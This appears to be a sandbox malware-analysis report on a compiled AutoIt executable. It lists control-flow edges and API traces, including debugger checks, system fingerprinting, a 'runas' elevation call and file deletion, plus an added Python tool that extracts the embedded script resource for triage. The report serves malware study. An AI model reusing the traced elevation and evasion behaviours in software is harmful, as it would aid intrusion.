105143->105001 105144->105007 105146 f0d4e3 105145->105146 105147 f0d4ce 105145->105147 105149 f08af4 __dosmaperr 58 API calls 105146->105149 105151 f0d508 105146->105151 105148 f08af4 __dosmaperr 58 API calls 105147->105148 105150 f0d4d3 105148->105150 105152 f0d512 105149->105152 105153 f08b28 __gmtime64_s 58 API calls 105150->105153 105151->105126 105154 f08b28 __gmtime64_s 58 API calls 105152->105154 105155 f0d4db 105153->105155 105156 f0d51a 105154->105156 105155->105126 105157 f08db6 __gmtime64_s 9 API calls 105156->105157 105157->105155 105158->105128 105159->105131 105161 f11940 __write_nolock 105160->105161 105162 f0079e GetLongPathNameW 105161->105162 105163 ee7bcc 59 API calls 105162->105163 105164 ee72bd 105163->105164 105165 ee700b 105164->105165 105166 ee7667 59 API calls 105165->105166 105167 ee701d 105166->105167 105168 ee4750 60 API calls 105167->105168 105169 ee7028 105168->105169 105170 f1e885 105169->105170 105171 ee7033 105169->105171 105176 f1e89f 105170->105176 105218 ee7908 61 API calls 105170->105218 105172 ee3f74 59 API calls 105171->105172 105174 ee703f 105172->105174 105212 ee34c2 105174->105212 105177 ee7052 Mailbox 105177->104072 105179 ee4ddd 136 API calls 105178->105179 105180 ee688f 105179->105180 105181 f1e031 105180->105181 105182 ee4ddd 136 API calls 105180->105182 105183 f4955b 122 API calls 105181->105183 105184 ee68a3 105182->105184 105185 f1e046 105183->105185 105184->105181 105188 ee68ab 105184->105188 105186 f1e067 105185->105186 105187 f1e04a 105185->105187 105190 f00db6 Mailbox 59 API calls 105186->105190 105189 ee4e4a 84 API calls 105187->105189 105191 f1e052 105188->105191 105192 ee68b7 105188->105192 105189->105191 105211 f1e0ac Mailbox 105190->105211 105312 f442f8 90 API calls _wprintf 105191->105312 105219 ee6a8c 105192->105219 105195 f1e060 105195->105186 105197 f1e260 105198 f02d55 _free 58 API calls 105197->105198 105199 f1e268 105198->105199 105200 ee4e4a 84 API calls 105199->105200 105205 f1e271 105200->105205 
[Control-flow graph edge list: function nodes (addresses, API call counts, library-call tags) and their node-to-node edges; the rendered graph is not reproduced in text form]

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EE3B68
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00EE3B7A
                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FA52F8,00FA52E0,?,?), ref: 00EE3BEB
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                              • Part of subcall function 00EF092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EE3C14,00FA52F8,?,?,?), ref: 00EF096E
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00EE3C6F
                                                                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F97770,00000010), ref: 00F1D281
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00FA52F8,?,?,?), ref: 00F1D2B9
                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F94260,00FA52F8,?,?,?), ref: 00F1D33F
                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F1D346
                                                                                                                              • Part of subcall function 00EE3A46: GetSysColorBrush.USER32(0000000F), ref: 00EE3A50
                                                                                                                              • Part of subcall function 00EE3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00EE3A5F
                                                                                                                              • Part of subcall function 00EE3A46: LoadIconW.USER32(00000063), ref: 00EE3A76
                                                                                                                              • Part of subcall function 00EE3A46: LoadIconW.USER32(000000A4), ref: 00EE3A88
                                                                                                                              • Part of subcall function 00EE3A46: LoadIconW.USER32(000000A2), ref: 00EE3A9A
                                                                                                                              • Part of subcall function 00EE3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EE3AC0
                                                                                                                              • Part of subcall function 00EE3A46: RegisterClassExW.USER32(?), ref: 00EE3B16
                                                                                                                              • Part of subcall function 00EE39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EE3A03
                                                                                                                              • Part of subcall function 00EE39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EE3A24
                                                                                                                              • Part of subcall function 00EE39D5: ShowWindow.USER32(00000000,?,?), ref: 00EE3A38
                                                                                                                              • Part of subcall function 00EE39D5: ShowWindow.USER32(00000000,?,?), ref: 00EE3A41
                                                                                                                              • Part of subcall function 00EE434A: _memset.LIBCMT ref: 00EE4370
                                                                                                                              • Part of subcall function 00EE434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE4415
                                                                                                                            Strings
                                                                                                                            • runas, xrefs: 00F1D33A
                                                                                                                            • This is a third-party compiled AutoIt script., xrefs: 00F1D279
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                            • API String ID: 529118366-3287110873
                                                                                                                            • Opcode ID: 686f1b0507784fee4dbaea2da485a2f61c3a9cf7752781a45d67593ea3930987
                                                                                                                            • Instruction ID: f99da03a0210e05690f6f787e6ed7ca27255f63ea51ac6321f3652c9f31bddaa
                                                                                                                            • Opcode Fuzzy Hash: 686f1b0507784fee4dbaea2da485a2f61c3a9cf7752781a45d67593ea3930987
                                                                                                                            • Instruction Fuzzy Hash: 1F5109B1D0828CAEDF01EBF5EC05AEDBBF4AF46B50F105065F461B3162CA708645EB21

                                                                                                                             Control-flow Graph
                                                                                                                             • Function 00EE49A0 (basic blocks 00EE49A0-00EE4B35 and 00F1D767-00F1D894; graph image not preserved): calls GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary and GetSystemInfo to fingerprint the OS version, WoW64 state and processor architecture.
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00EE49CD
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00F6FAEC,00000000,00000000,?), ref: 00EE4A9A
                                                                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00EE4AA1
                                                                                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00EE4AE7
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00EE4AF2
                                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00EE4B23
                                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00EE4B2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1986165174-0
                                                                                                                            • Opcode ID: 59b257d638ac3957401deed17316e44db083a3f0b13cc834696fc140e8d8358c
                                                                                                                            • Instruction ID: aa4637ae743f5110d7effd32779cbed11616645f5a8d938a7873d4c69c5d4b03
                                                                                                                            • Opcode Fuzzy Hash: 59b257d638ac3957401deed17316e44db083a3f0b13cc834696fc140e8d8358c
                                                                                                                            • Instruction Fuzzy Hash: E691177198D7C8DEC731DB7994501EAFFF5AF2A310B0849ADD0CBA3A81E220E548D759

                                                                                                                             Control-flow Graph
                                                                                                                             • Function 00EE4E89 (basic blocks 00EE4E89-00EE4EC6 and 00F1D933-00F1D98B; graph image not preserved): CreateStreamOnHGlobal, then FindResourceExW for an RT_RCDATA (type 0x0A) resource named "SCRIPT", followed by LoadResource, SizeofResource and LockResource. This is the AutoIt runtime locating the embedded compiled script.
                                                                                                                            APIs
                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EE4D8E,?,?,00000000,00000000), ref: 00EE4E99
                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EE4D8E,?,?,00000000,00000000), ref: 00EE4EB0
                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00EE4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EE4E2F), ref: 00F1D937
                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00EE4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EE4E2F), ref: 00F1D94C
                                                                                                                            • LockResource.KERNEL32(00EE4D8E,?,?,00EE4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EE4E2F,00000000), ref: 00F1D95F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                            • String ID: SCRIPT
                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                            • Opcode ID: bb46873736663f3ad82dd9e83fe2d1aa0bbdff550ea0a0ca64d32c9747055eee
                                                                                                                            • Instruction ID: 2ee9ed3cfc3edda08e533067bbef8283122c98f416dea85bd5ed1e41e03e0a32
                                                                                                                            • Opcode Fuzzy Hash: bb46873736663f3ad82dd9e83fe2d1aa0bbdff550ea0a0ca64d32c9747055eee
                                                                                                                            • Instruction Fuzzy Hash: 601170B5240748BFD7218B66EC48F677BBAFBC5B11F10426CF415DA2A0DBB1EC049A60
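The API sequence recorded for this function (FindResourceExW with type 0x0A = RT_RCDATA and name "SCRIPT", then LoadResource, SizeofResource, LockResource) is how a compiled AutoIt executable finds its own script blob. The same lookup can be done statically on the file, which is what an analyst wants when extracting the script for decompilation. The following is an added example written for this report, not code from Joe Sandbox or from AutoIt: it walks the PE resource directory (type, name, language) without any third-party module and returns the raw bytes of the RT_RCDATA "SCRIPT" resource. The function and helper names, the PE32/PE32+ handling and the synthetic PE built by build_test_pe (a constructed minimal image used so the example runs offline) are all assumptions of this example. The returned blob is AutoIt's own compiled-script container, not source; recovering source from it still needs a separate AutoIt decompiler.

```python
import struct
import sys

RT_RCDATA = 10  # resource type the sample passes to FindResourceExW (0x0A)


def _u16(b, o):
    return struct.unpack_from("<H", b, o)[0]


def _u32(b, o):
    return struct.unpack_from("<I", b, o)[0]


def _rva_to_off(sections, rva):
    """Map an RVA to a file offset via the section table."""
    for va, vsize, raw, rsize in sections:
        if va <= rva < va + max(vsize, rsize):
            return rva - va + raw
    raise ValueError("RVA 0x%x is not inside any section" % rva)


def _dir_entries(data, base, off):
    """Yield (key, child_offset, is_subdir) for one IMAGE_RESOURCE_DIRECTORY.

    The 16-byte header carries NumberOfNamedEntries (+12) and NumberOfIdEntries (+14);
    each 8-byte entry is Name/Id followed by OffsetToData, high bit set = subdirectory.
    """
    hdr = base + off
    count = _u16(data, hdr + 12) + _u16(data, hdr + 14)
    for i in range(count):
        e = hdr + 16 + 8 * i
        name, child = _u32(data, e), _u32(data, e + 4)
        if name & 0x80000000:
            # Named entry: IMAGE_RESOURCE_DIR_STRING_U (u16 length, then UTF-16LE chars)
            so = base + (name & 0x7FFFFFFF)
            length = _u16(data, so)
            key = data[so + 2:so + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name
        yield key, child & 0x7FFFFFFF, bool(child & 0x80000000)


def extract_autoit_script(data, name="SCRIPT"):
    """Return the bytes of the RT_RCDATA resource called `name`, or None if absent."""
    e_lfanew = _u32(data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = _u16(data, e_lfanew + 6)
    opt_size = _u16(data, e_lfanew + 20)
    opt = e_lfanew + 24
    magic = _u16(data, opt)
    dd = opt + (0x60 if magic == 0x10B else 0x70)   # DataDirectory start, PE32 vs PE32+
    rsrc_rva = _u32(data, dd + 8 * 2)                # IMAGE_DIRECTORY_ENTRY_RESOURCE == 2
    sec = opt + opt_size
    sections = [(_u32(data, s + 12), _u32(data, s + 8), _u32(data, s + 20), _u32(data, s + 16))
                for s in (sec + 40 * i for i in range(nsec))]
    base = _rva_to_off(sections, rsrc_rva)
    for key, type_dir, is_dir in _dir_entries(data, base, 0):
        if key != RT_RCDATA or not is_dir:
            continue
        for nkey, name_dir, ndir in _dir_entries(data, base, type_dir):
            if nkey != name or not ndir:
                continue
            for _lang, leaf, ldir in _dir_entries(data, base, name_dir):
                if ldir:
                    continue
                # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (an RVA), Size, CodePage, Reserved
                rva, size = _u32(data, base + leaf), _u32(data, base + leaf + 4)
                off = _rva_to_off(sections, rva)
                return data[off:off + size]
    return None


def build_test_pe(payload):
    """Constructed minimal PE32 with one .rsrc section holding RT_RCDATA/"SCRIPT"/lang 0x409."""
    rsrc = bytearray(0x70) + payload
    struct.pack_into("<HH", rsrc, 0x0C, 0, 1)                                  # root: 1 id entry
    struct.pack_into("<II", rsrc, 0x10, RT_RCDATA, 0x80000000 | 0x18)
    struct.pack_into("<HH", rsrc, 0x18 + 0x0C, 1, 0)                           # type dir: 1 named entry
    struct.pack_into("<II", rsrc, 0x18 + 0x10, 0x80000000 | 0x48, 0x80000000 | 0x30)
    struct.pack_into("<HH", rsrc, 0x30 + 0x0C, 0, 1)                           # name dir: 1 language entry
    struct.pack_into("<II", rsrc, 0x30 + 0x10, 0x409, 0x60)
    struct.pack_into("<H", rsrc, 0x48, 6)
    rsrc[0x4A:0x4A + 12] = "SCRIPT".encode("utf-16-le")
    struct.pack_into("<IIII", rsrc, 0x60, 0x1000 + 0x70, len(payload), 0, 0)   # data entry
    pe = bytearray(0x200)
    pe[0:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)
    pe[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", pe, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)    # IMAGE_FILE_HEADER
    opt = 0x58
    struct.pack_into("<H", pe, opt, 0x10B)                                      # PE32 magic
    struct.pack_into("<II", pe, opt + 0x60 + 8 * 2, 0x1000, len(rsrc))         # resource directory
    sec = opt + 0xE0
    pe[sec:sec + 8] = b".rsrc\0\0\0"
    struct.pack_into("<IIII", pe, sec + 8, len(rsrc), 0x1000, len(rsrc), 0x200)
    return bytes(pe) + bytes(rsrc)


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        blob = extract_autoit_script(f.read())
    print("no SCRIPT resource" if blob is None else "SCRIPT resource: %d bytes" % len(blob))
```

Run it against the sample as `python extract_script.py 3i1gMM8K4z.exe`; a non-AutoIt PE returns None rather than raising, so the same call is usable as a cheap triage check across a directory of samples.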
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpper
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3964851224-0
                                                                                                                            • Opcode ID: 6bc88d5903f4ec166754b9eafb2dc3e137ef06340591c4093a0845b519788a9c
                                                                                                                            • Instruction ID: e63a5956acf442dd3c6ff760653daa5094786d9566ff84ffa09ca8d02a91405c
                                                                                                                            • Opcode Fuzzy Hash: 6bc88d5903f4ec166754b9eafb2dc3e137ef06340591c4093a0845b519788a9c
                                                                                                                            • Instruction Fuzzy Hash: 3B92BB70A08355CFD720DF14C480B6AB7E0BF85314F14986DE98AAB362DBB5EC45DB92
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00F1E398), ref: 00F4446A
                                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00F4447B
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4448B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 48322524-0
                                                                                                                            • Opcode ID: 61409348db10b8e08ee6efba4df6d7b17f8e8a68608ac7d9dcb85b035be0f5dc
                                                                                                                            • Instruction ID: fcc9c553fa5948ee7e5deae1f0064538e456eba85afbfcdf190338a20ade0291
                                                                                                                            • Opcode Fuzzy Hash: 61409348db10b8e08ee6efba4df6d7b17f8e8a68608ac7d9dcb85b035be0f5dc
                                                                                                                            • Instruction Fuzzy Hash: 7AE0D837810504674210AB38FC0D5E97F5C9E05335F100716FC35D11E0E7B46904B995
                                                                                                                            Strings
                                                                                                                            • Variable must be of type 'Object'., xrefs: 00F23E62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                            • API String ID: 0-109567571
                                                                                                                            • Opcode ID: 299d8849075aa3aa8ed7274c87645a67e5cb07e32ad27ca88cfa579312ca1fca
                                                                                                                            • Instruction ID: ef06d3d55913e80f6bfb6c6f9d2d4be16a56c64b2229e6cb8254014d23c18117
                                                                                                                            • Opcode Fuzzy Hash: 299d8849075aa3aa8ed7274c87645a67e5cb07e32ad27ca88cfa579312ca1fca
                                                                                                                            • Instruction Fuzzy Hash: 75A28B74A0029DCFCB24CF56C880AAAB7F1FF59314F289069E819AB351D775ED42DB90
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF0A5B
                                                                                                                            • timeGetTime.WINMM ref: 00EF0D16
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF0E53
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00EF0E61
                                                                                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00EF0EFA
                                                                                                                            • DestroyWindow.USER32 ref: 00EF0F06
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EF0F20
                                                                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00F24E83
                                                                                                                            • TranslateMessage.USER32(?), ref: 00F25C60
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00F25C6E
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F25C82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                            • API String ID: 4212290369-3242690629
                                                                                                                            • Opcode ID: c1b0a2643ba2338420cccc9add584758f3bb7dadb592c439a63c3cc84884ea2d
                                                                                                                            • Instruction ID: eb1690d0ddbca3ff6042826a2b425e22fbbd7bcdc9a2c63b97724e470f58ea75
                                                                                                                            • Opcode Fuzzy Hash: c1b0a2643ba2338420cccc9add584758f3bb7dadb592c439a63c3cc84884ea2d
                                                                                                                            • Instruction Fuzzy Hash: 84B23270608745DFD724DF24C884BAEB7E0BF84714F14491DF59AA72A2CB71E884EB82

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F48F5F: __time64.LIBCMT ref: 00F48F69
                                                                                                                              • Part of subcall function 00EE4EE5: _fseek.LIBCMT ref: 00EE4EFD
                                                                                                                            • __wsplitpath.LIBCMT ref: 00F49234
                                                                                                                              • Part of subcall function 00F040FB: __wsplitpath_helper.LIBCMT ref: 00F0413B
                                                                                                                            • _wcscpy.LIBCMT ref: 00F49247
                                                                                                                            • _wcscat.LIBCMT ref: 00F4925A
                                                                                                                            • __wsplitpath.LIBCMT ref: 00F4927F
                                                                                                                            • _wcscat.LIBCMT ref: 00F49295
                                                                                                                            • _wcscat.LIBCMT ref: 00F492A8
                                                                                                                              • Part of subcall function 00F48FA5: _memmove.LIBCMT ref: 00F48FDE
                                                                                                                              • Part of subcall function 00F48FA5: _memmove.LIBCMT ref: 00F48FED
                                                                                                                            • _wcscmp.LIBCMT ref: 00F491EF
                                                                                                                              • Part of subcall function 00F49734: _wcscmp.LIBCMT ref: 00F49824
                                                                                                                              • Part of subcall function 00F49734: _wcscmp.LIBCMT ref: 00F49837
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F49452
                                                                                                                            • _wcsncpy.LIBCMT ref: 00F494C5
                                                                                                                            • DeleteFileW.KERNEL32(?,?), ref: 00F494FB
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F49511
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F49522
                                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F49534
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1500180987-0
                                                                                                                            • Opcode ID: 4293e00a8028972b837bf1c7e5e3a7afb28a74ee4cfec914ce0f2ee0e37a7bcd
                                                                                                                            • Instruction ID: 89f75a525589865f8a5dd117638e6c26438d65f823eb430863dd09ea74122321
                                                                                                                            • Opcode Fuzzy Hash: 4293e00a8028972b837bf1c7e5e3a7afb28a74ee4cfec914ce0f2ee0e37a7bcd
                                                                                                                            • Instruction Fuzzy Hash: 8BC16CB1E00219AADF21DF95CC85ADFBBBCEF45310F0040AAF609E6191DB749A449F61

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00EE3074
• RegisterClassExW.USER32(00000030), ref: 00EE309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE30AF
• InitCommonControlsEx.COMCTL32(?), ref: 00EE30CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE30DC
• LoadIconW.USER32(000000A9), ref: 00EE30F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE3101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
